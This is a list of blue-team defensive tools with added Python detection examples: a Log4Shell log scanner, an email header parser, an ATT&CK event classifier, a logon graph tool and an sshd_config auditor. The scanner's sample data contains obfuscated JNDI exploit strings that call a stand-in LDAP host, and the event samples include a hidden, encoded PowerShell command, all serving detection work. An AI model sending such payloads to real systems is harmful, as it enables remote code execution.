Blue Team

Tools for passive or active defence. Includes honeypot systems, event-log analysis and monitoring tools, and sandbox hardening utilities.

Ansible Role Log4Shell Detector

Ansible role that runs the log4shell-detector script on Debian- and RHEL-based hosts.
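
The core of a Log4Shell log scanner is not the search for `${jndi:` itself but undoing the obfuscations attackers use to hide it (URL encoding, `${lower:j}`, `${::-j}`, `${env:X:-j}`), because Log4j resolves those before the lookup fires. The following is an added example of that normalisation and detection over constructed log lines; it is not the log4shell-detector project's own code and covers only the common obfuscation layers.

```python
"""Scan web-server log lines for Log4Shell (CVE-2021-44228) exploitation
attempts, including common obfuscations of the ${jndi:...} lookup.
Added example; not the log4shell-detector project's own code."""
import re
from urllib.parse import unquote

# Obfuscation layers that Log4j itself resolves before the JNDI lookup runs.
_CASE = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}")      # ${lower:j}      -> j
_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")           # ${::-j}, ${env:X:-j} -> j
_JNDI = re.compile(r'\$\{jndi:([a-z0-9]+):/{0,2}([^}"\s]+)')  # ${jndi:ldap://host/path}

# Constructed sample lines (not real captures); 198.51.100.7 is a documentation address.
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.7/b} HTTP/1.1" 404',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7/c}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 "-" "${${env:NOPE:-j}ndi:dns://198.51.100.7/d}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:06 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fe%7D HTTP/1.1" 200',
    'app.log: documentation note mentioning the JndiLookup class in a benign line',
]


def normalize(line: str, max_rounds: int = 10) -> str:
    """Undo URL-encoding and Log4j lookup tricks, repeating until the text is stable
    (nested layers such as %24%7B${lower:j}...%7D need several passes)."""
    text = line
    for _ in range(max_rounds):
        prev = text
        text = unquote(text).lower()
        text = _CASE.sub(r"\1", text)
        text = _DEFAULT.sub(r"\1", text)
        if text == prev:
            break
    return text


def detect(line: str):
    """Return (scheme, target) of a JNDI lookup found in the line, or None."""
    m = _JNDI.search(normalize(line))
    if not m:
        return None
    return m.group(1), m.group(2)


def scan_lines(lines):
    """Return [(line_number, scheme, target)] for every line carrying a lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = detect(line)
        if found:
            hits.append((n, *found))
    return hits


if __name__ == "__main__":
    for n, scheme, target in scan_lines(SAMPLE_LINES):
        print(f"line {n}: jndi lookup via {scheme} to {target}")
```

A benign mention of "jndi" (last sample line) is not flagged, since only the resolved `${jndi:` form matters; on a real host, run the scanner over access logs, application logs and any other file the vulnerable service logged request data into.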

AntiVMDetection

Tool to harden VMs against environment detection by malware

Artillery

Combined honeypot, monitoring tool, and alerting system

BoomBox

Auto-Install script for Cuckoo Malware analysis sandbox

Canarytokens

Canarytokens helps track activity and actions on your network by planting tokens (URLs, DNS names, documents, credentials) that alert when they are opened or used.

chkrootkit

Linux rootkit finder

CobaltStrikeScan

Scan files or process memory for Cobalt Strike beacons and parse their configuration

Email Header Analyser

Parses email headers into human readable format
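
What an analyst wants from a header parser is the Received chain in delivery order with the delay at each hop, the source IPs, and the SPF/DKIM/DMARC verdicts. The following is an added example of that using only the Python standard library, run over a constructed phishing message; it is not the Email Header Analyser project's own code.

```python
"""Turn raw email headers into a readable delivery summary: the Received
chain oldest-first with per-hop delays, plus SPF/DKIM/DMARC verdicts.
Added example; standard library only, not the Email Header Analyser project's code."""
import re
from email import message_from_string
from email.utils import parsedate_to_datetime

# Constructed sample (not a real capture): a spoofed invoice that entered via an
# unauthenticated relay with no reverse DNS and failed SPF and DMARC.
RAW_MESSAGE = """\
Received: from mx.example.net (mx.example.net [203.0.113.10])
    by inbound.example.com with ESMTPS id abc123;
    Mon, 4 Mar 2024 10:00:12 +0000
Received: from relay.attacker.test (unknown [198.51.100.23])
    by mx.example.net with ESMTP id xyz789;
    Mon, 4 Mar 2024 09:58:40 +0000
Authentication-Results: inbound.example.com;
    spf=fail smtp.mailfrom=payments.example.org;
    dkim=none;
    dmarc=fail header.from=example.org
From: "Payments" <payments@example.org>
To: victim@example.com
Subject: Invoice overdue
Message-ID: <1234@relay.attacker.test>

Please see attached.
"""

_HOP = re.compile(r"from\s+(?P<from>\S+)(?:\s+\((?P<comment>[^)]*)\))?.*?\bby\s+(?P<by>\S+)", re.S)
_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
_AUTH = re.compile(r"\b(spf|dkim|dmarc)=(\w+)")


def _flat(value):
    """Collapse folded header continuation lines into one line."""
    return re.sub(r"\s+", " ", value).strip()


def received_chain(raw):
    """Each MTA prepends its Received header, so the last one listed is the first
    hop. Return hops oldest-first with the delay (seconds) since the prior hop."""
    msg = message_from_string(raw)
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        value = _flat(value)
        m = _HOP.search(value)
        if not m:
            continue  # non-standard Received line: skip rather than guess
        comment = m.group("comment") or ""
        ip_m = _IP.search(comment)
        when = parsedate_to_datetime(value.rsplit(";", 1)[-1].strip())
        hops.append({"from": m.group("from"), "comment": comment,
                     "ip": ip_m.group(1) if ip_m else None, "by": m.group("by"),
                     "time": when,
                     "delay_s": int((when - hops[-1]["time"]).total_seconds()) if hops else 0})
    return hops


def auth_results(raw):
    """Map spf/dkim/dmarc to their verdicts from Authentication-Results."""
    msg = message_from_string(raw)
    found = {}
    for value in msg.get_all("Authentication-Results", []):
        found.update((k.lower(), v.lower()) for k, v in _AUTH.findall(_flat(value)))
    return found


def summarize(raw):
    """Readable hop lines plus the red flags an analyst checks first."""
    hops, auth = received_chain(raw), auth_results(raw)
    flags = [f"{k}={v}" for k, v in auth.items()
             if v in ("fail", "softfail", "permerror", "temperror")]
    if hops and hops[0]["comment"].startswith("unknown"):
        flags.append("first hop has no reverse DNS")
    lines = [f"{i}. {h['from']} ({h['ip'] or '-'}) -> {h['by']} at "
             f"{h['time'].isoformat()} (+{h['delay_s']}s)" for i, h in enumerate(hops, 1)]
    return {"hops": lines, "auth": auth, "flags": flags}


if __name__ == "__main__":
    for key, val in summarize(RAW_MESSAGE).items():
        print(key, val)
```

Note that only the Received header added by your own edge MTA is trustworthy; anything below it in the list was written by an upstream server and can be forged, which is why the authentication results and the first-hop IP matter more than the hostnames.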

EVTX-to-MITRE-Attack

EVTX to MITRE ATT&CK is a SIEM-oriented project. It provides more than 270 Windows event-log IOCs classified by ATT&CK tactic and technique, so that different security scenarios can be covered with your SIEM.
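
In a SIEM such a mapping is applied as a rule set: each rule is a predicate over a Windows event record that, when it matches, tags the record with a technique and its tactic. The following is an added example with five constructed rules and six constructed events in the shape a JSON export of EVTX gives; it is not the project's own IOC list, and the rules are illustrative, not its >270 indicators.

```python
"""Classify Windows event-log records into MITRE ATT&CK techniques/tactics
with a small rule set, the way a SIEM applies an IOC mapping.
Added example; rules and sample events are constructed, not the project's content."""


def _d(e):
    """EventData holds the record's named fields in a JSON EVTX export."""
    return e.get("EventData", {})


# Each rule: (technique, tactic, short name, predicate over one event dict).
RULES = [
    ("T1059.001", "Execution", "PowerShell with encoded command",
     lambda e: e["EventID"] == 4688
     and _d(e).get("NewProcessName", "").lower().endswith("\\powershell.exe")
     and any(f in " " + _d(e).get("CommandLine", "").lower() for f in (" -enc", " -e "))),
    ("T1021.001", "Lateral Movement", "RDP logon (logon type 10)",
     # exports may carry LogonType as int or string; compare as text
     lambda e: e["EventID"] == 4624 and str(_d(e).get("LogonType")) == "10"),
    ("T1543.003", "Persistence", "service installed with a shell-launched image path",
     lambda e: e["EventID"] == 7045 and "/c " in _d(e).get("ImagePath", "").lower()),
    ("T1136.001", "Persistence", "local account created",
     lambda e: e["EventID"] == 4720),
    ("T1070.001", "Defense Evasion", "Security audit log cleared",
     lambda e: e["EventID"] == 1102),
]

# Constructed sample events (not real logs).
SAMPLE_EVENTS = [
    {"EventID": 4688, "Channel": "Security", "Computer": "WS01",
     "EventData": {"NewProcessName": "C:\\Windows\\System32\\notepad.exe",
                   "ParentProcessName": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe"}},
    {"EventID": 4688, "Channel": "Security", "Computer": "WS01",
     "EventData": {"NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                   "ParentProcessName": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
                   "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"}},
    {"EventID": 4624, "Channel": "Security", "Computer": "FS01",
     "EventData": {"TargetUserName": "svc_backup", "LogonType": "10", "IpAddress": "10.0.1.22"}},
    {"EventID": 7045, "Channel": "System", "Computer": "FS01",
     "EventData": {"ServiceName": "updsvc", "ImagePath": "%COMSPEC% /c start /b powershell -nop -w hidden"}},
    {"EventID": 1102, "Channel": "Security", "Computer": "FS01",
     "EventData": {"SubjectUserName": "svc_backup"}},
    {"EventID": 4720, "Channel": "Security", "Computer": "FS01",
     "EventData": {"TargetUserName": "svc_backup2", "SubjectUserName": "svc_backup"}},
]


def classify(event):
    """Return every (technique, tactic, name) whose predicate matches the event."""
    return [(tid, tactic, name) for tid, tactic, name, pred in RULES if pred(event)]


def triage(events):
    """Flatten matches to (computer, EventID, technique, tactic) in log order."""
    out = []
    for e in events:
        for tid, tactic, _name in classify(e):
            out.append((e.get("Computer", "?"), e["EventID"], tid, tactic))
    return out


def tactic_counts(events):
    """How many matched events fall under each tactic; a quick kill-chain overview."""
    counts = {}
    for _computer, _eid, _tid, tactic in triage(events):
        counts[tactic] = counts.get(tactic, 0) + 1
    return counts


if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(row)
    print(tactic_counts(SAMPLE_EVENTS))
```

The benign notepad launch produces no tag, while the remaining events on FS01 line up as Execution, Lateral Movement, Persistence and Defense Evasion, which is the view a SIEM dashboard built on such a mapping gives an analyst.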

HoneyUp

An uploader honeypot designed to look like poor website security.

Infection Monkey

The Infection Monkey is an open source security tool for testing a data center's resiliency to perimeter breaches and internal server infection

Kushtaka

All-In-One honeypot solution for under-resourced blue teams

Logout4Shell

The Cybereason research team developed code that exploits the same vulnerability, but with a payload that disables the vulnerable setting. The payload then searches every LoggerContext and removes the JNDI Interpolator, preventing even recursive abuse. This effectively blocks any further attempt to exploit Log4Shell on that server.

LogonTracer

Tool to investigate malicious logons by visualising and analysing Active Directory event logs
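
The analysis behind such a tool is a graph of accounts and hosts built from logon events (4624 success, 4625 failure): which account touched how many hosts, from which source address, and how quickly. The following is an added example over constructed events that builds that graph, ranks accounts by fan-out, flags network logons to many hosts in a short window, and emits Graphviz DOT for visualisation; it is not the LogonTracer project's code, and the thresholds are assumptions.

```python
"""Account/host logon graph from Windows 4624/4625 events, with fan-out ranking,
lateral-movement windowing, shared-source pivoting and DOT output.
Added example; not LogonTracer's code. Sample events are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed events: (time, EventID, account, target host, source IP, logon type).
SAMPLE_LOGONS = [
    ("2024-03-04T08:01:00", 4624, "alice", "WS01", "10.0.1.15", 2),
    ("2024-03-04T08:05:00", 4624, "alice", "FS01", "10.0.1.15", 3),
    ("2024-03-04T09:10:00", 4624, "bob", "WS02", "10.0.1.22", 2),
    ("2024-03-04T13:00:00", 4625, "svc_backup", "DC01", "10.0.1.22", 3),
    ("2024-03-04T13:00:05", 4625, "svc_backup", "DC01", "10.0.1.22", 3),
    ("2024-03-04T13:00:20", 4624, "svc_backup", "DC01", "10.0.1.22", 3),
    ("2024-03-04T13:02:00", 4624, "svc_backup", "FS01", "10.0.1.22", 3),
    ("2024-03-04T13:03:30", 4624, "svc_backup", "WS01", "10.0.1.22", 3),
    ("2024-03-04T13:05:00", 4624, "svc_backup", "WS03", "10.0.1.22", 3),
]


def build_graph(events):
    """Return (edges, failures, sources): account -> host -> successful-logon count,
    failed-logon count per account, and the set of source IPs per account."""
    edges = defaultdict(lambda: defaultdict(int))
    failures, sources = defaultdict(int), defaultdict(set)
    for _ts, eid, acct, host, ip, _ltype in events:
        sources[acct].add(ip)
        if eid == 4624:
            edges[acct][host] += 1
        elif eid == 4625:
            failures[acct] += 1
    return edges, dict(failures), dict(sources)


def fan_out(edges):
    """Accounts ranked by number of distinct hosts logged on to (most first)."""
    return sorted(((a, len(h)) for a, h in edges.items()), key=lambda x: (-x[1], x[0]))


def lateral_movement_candidates(events, min_hosts=3, window=timedelta(minutes=15)):
    """Accounts with successful network logons (type 3) to >= min_hosts distinct
    hosts inside any `window`; thresholds are assumptions, tune per environment."""
    per_acct = defaultdict(list)
    for ts, eid, acct, host, _ip, ltype in events:
        if eid == 4624 and ltype == 3:
            per_acct[acct].append((datetime.fromisoformat(ts), host))
    flagged = []
    for acct, seq in per_acct.items():
        seq.sort()
        for i, (t0, _h) in enumerate(seq):          # sliding window from each logon
            hosts = {h for t, h in seq[i:] if t - t0 <= window}
            if len(hosts) >= min_hosts:
                flagged.append(acct)
                break
    return sorted(flagged)


def shared_sources(sources):
    """Source IPs used by more than one account: the pivot from a flagged
    service account back to the workstation (and user) it was launched from."""
    by_ip = defaultdict(set)
    for acct, ips in sources.items():
        for ip in ips:
            by_ip[ip].add(acct)
    return {ip: accts for ip, accts in by_ip.items() if len(accts) > 1}


def to_dot(edges):
    """Graphviz DOT of the account/host graph, edge label = successful logons."""
    lines = ["graph logons {"]
    for acct, hosts in sorted(edges.items()):
        for host, n in sorted(hosts.items()):
            lines.append(f'  "{acct}" -- "{host}" [label="{n}"];')
    lines.append("}")
    return "\n".join(lines)


if __name__ == "__main__":
    edges, failures, sources = build_graph(SAMPLE_LOGONS)
    print(fan_out(edges), failures)
    print(lateral_movement_candidates(SAMPLE_LOGONS), shared_sources(sources))
    print(to_dot(edges))
```

In the sample, svc_backup fails twice against DC01, then succeeds against four hosts in five minutes from 10.0.1.22, the same address bob logged on from; that shared source is what turns a noisy account into a lead on the compromised workstation.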

Loki

Scanner for Simple Indicators of Compromise

Manuka

Manuka is an Open-source intelligence (OSINT) honeypot that monitors reconnaissance attempts by threat actors and generates actionable intelligence for Blue Teamers.

Maltrail

Malicious traffic detection system

Pafish

Used to detect sandboxes and virtual environments; useful for checking how detectable a Cuckoo sandbox is

ssh-audit

Tool to audit ssh server and client configs
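
ssh-audit talks to a running server and reads the algorithms it actually offers. A complementary static check over `sshd_config` catches the same classes of weakness before deployment: legacy protocol, DSA/ECDSA host keys, SHA-1 key exchange, CBC ciphers, MD5/SHA-1 MACs, root password logins, and password authentication left at its default. The following is an added example with a weak and a hardened configuration constructed side by side; it is not the ssh-audit project's code, and it does not audit server defaults for directives that are absent (only the live check sees those).

```python
"""Static audit of an sshd_config for ssh-audit style findings.
Added example; not ssh-audit's code. Both sample configs are constructed."""
import re

WEAK_KEX = {"diffie-hellman-group1-sha1", "diffie-hellman-group14-sha1",
            "diffie-hellman-group-exchange-sha1"}
WEAK_CIPHER_MARKS = ("-cbc", "arcfour", "blowfish", "cast128")   # 3des-cbc is caught by -cbc
WEAK_MAC_MARKS = ("hmac-md5", "hmac-sha1", "-96", "umac-64")

# Constructed legacy configuration with the weaknesses the checks below report.
WEAK_CONFIG = """
Port 22
Protocol 2,1
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
PermitRootLogin yes
KexAlgorithms diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,curve25519-sha256
Ciphers aes128-cbc,3des-cbc,aes256-ctr
MACs hmac-md5,hmac-sha1,hmac-sha2-256
Match User backup
    PasswordAuthentication yes
"""

# Constructed hardened counterpart: ed25519/RSA host keys, modern KEX/ciphers/MACs, keys only.
HARDENED_CONFIG = """
Port 22
HostKey /etc/ssh/ssh_host_ed25519_key
HostKey /etc/ssh/ssh_host_rsa_key
PermitRootLogin no
PasswordAuthentication no
KexAlgorithms curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group16-sha512
Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes256-ctr
MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com
HostKeyAlgorithms ssh-ed25519,rsa-sha2-512
"""


def parse_sshd_config(text):
    """Return (global_settings, match_blocks). Values are lists in file order:
    sshd honours the first value of a repeated keyword, except HostKey, which is
    cumulative. Directives under 'Match' apply only to matching sessions."""
    global_, matches = {}, []
    current = global_
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, value = (re.split(r"[\s=]+", line, maxsplit=1) + [""])[:2]
        key = key.lower()
        if key == "match":
            current = {}
            matches.append((value, current))
            continue
        current.setdefault(key, []).append(value)
    return global_, matches


def audit(text):
    """Return [(severity, directive, message)] findings for the configuration."""
    cfg, matches = parse_sshd_config(text)
    first = lambda k, default: cfg.get(k, [default])[0]
    findings = []
    if "1" in first("protocol", "2").split(","):
        findings.append(("high", "Protocol", "SSH protocol version 1 is enabled"))
    for path in cfg.get("hostkey", []):
        if "dsa" in path:   # matches ssh_host_dsa_key and ssh_host_ecdsa_key
            findings.append(("medium", "HostKey", f"DSA/ECDSA host key in use: {path}"))
    if first("permitrootlogin", "prohibit-password").lower() == "yes":
        findings.append(("high", "PermitRootLogin", "root may log in with a password"))
    if first("passwordauthentication", "yes").lower() == "yes":   # default is yes when unset
        findings.append(("medium", "PasswordAuthentication",
                         "password authentication enabled (the default when unset)"))
    for alg in first("kexalgorithms", "").split(","):
        if alg in WEAK_KEX or alg.startswith("ecdh-sha2-nistp"):
            findings.append(("medium", "KexAlgorithms", f"weak key exchange: {alg}"))
    for alg in first("ciphers", "").split(","):
        if any(m in alg for m in WEAK_CIPHER_MARKS):
            findings.append(("medium", "Ciphers", f"weak cipher: {alg}"))
    for alg in first("macs", "").split(","):
        if any(m in alg for m in WEAK_MAC_MARKS):
            findings.append(("medium", "MACs", f"weak MAC: {alg}"))
    for cond, block in matches:
        if block.get("passwordauthentication", [""])[0].lower() == "yes":
            findings.append(("medium", f"Match {cond}",
                             "password authentication re-enabled for matching sessions"))
    return findings


if __name__ == "__main__":
    for f in audit(WEAK_CONFIG):
        print(*f)
    print("hardened:", audit(HARDENED_CONFIG))
```

The `Match` handling matters in practice: a globally disabled setting silently comes back for the sessions a `Match` block covers, which a grep for `PasswordAuthentication no` will not notice.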

VMCloak

Tool to harden VMs against VM detection; designed for use with Cuckoo
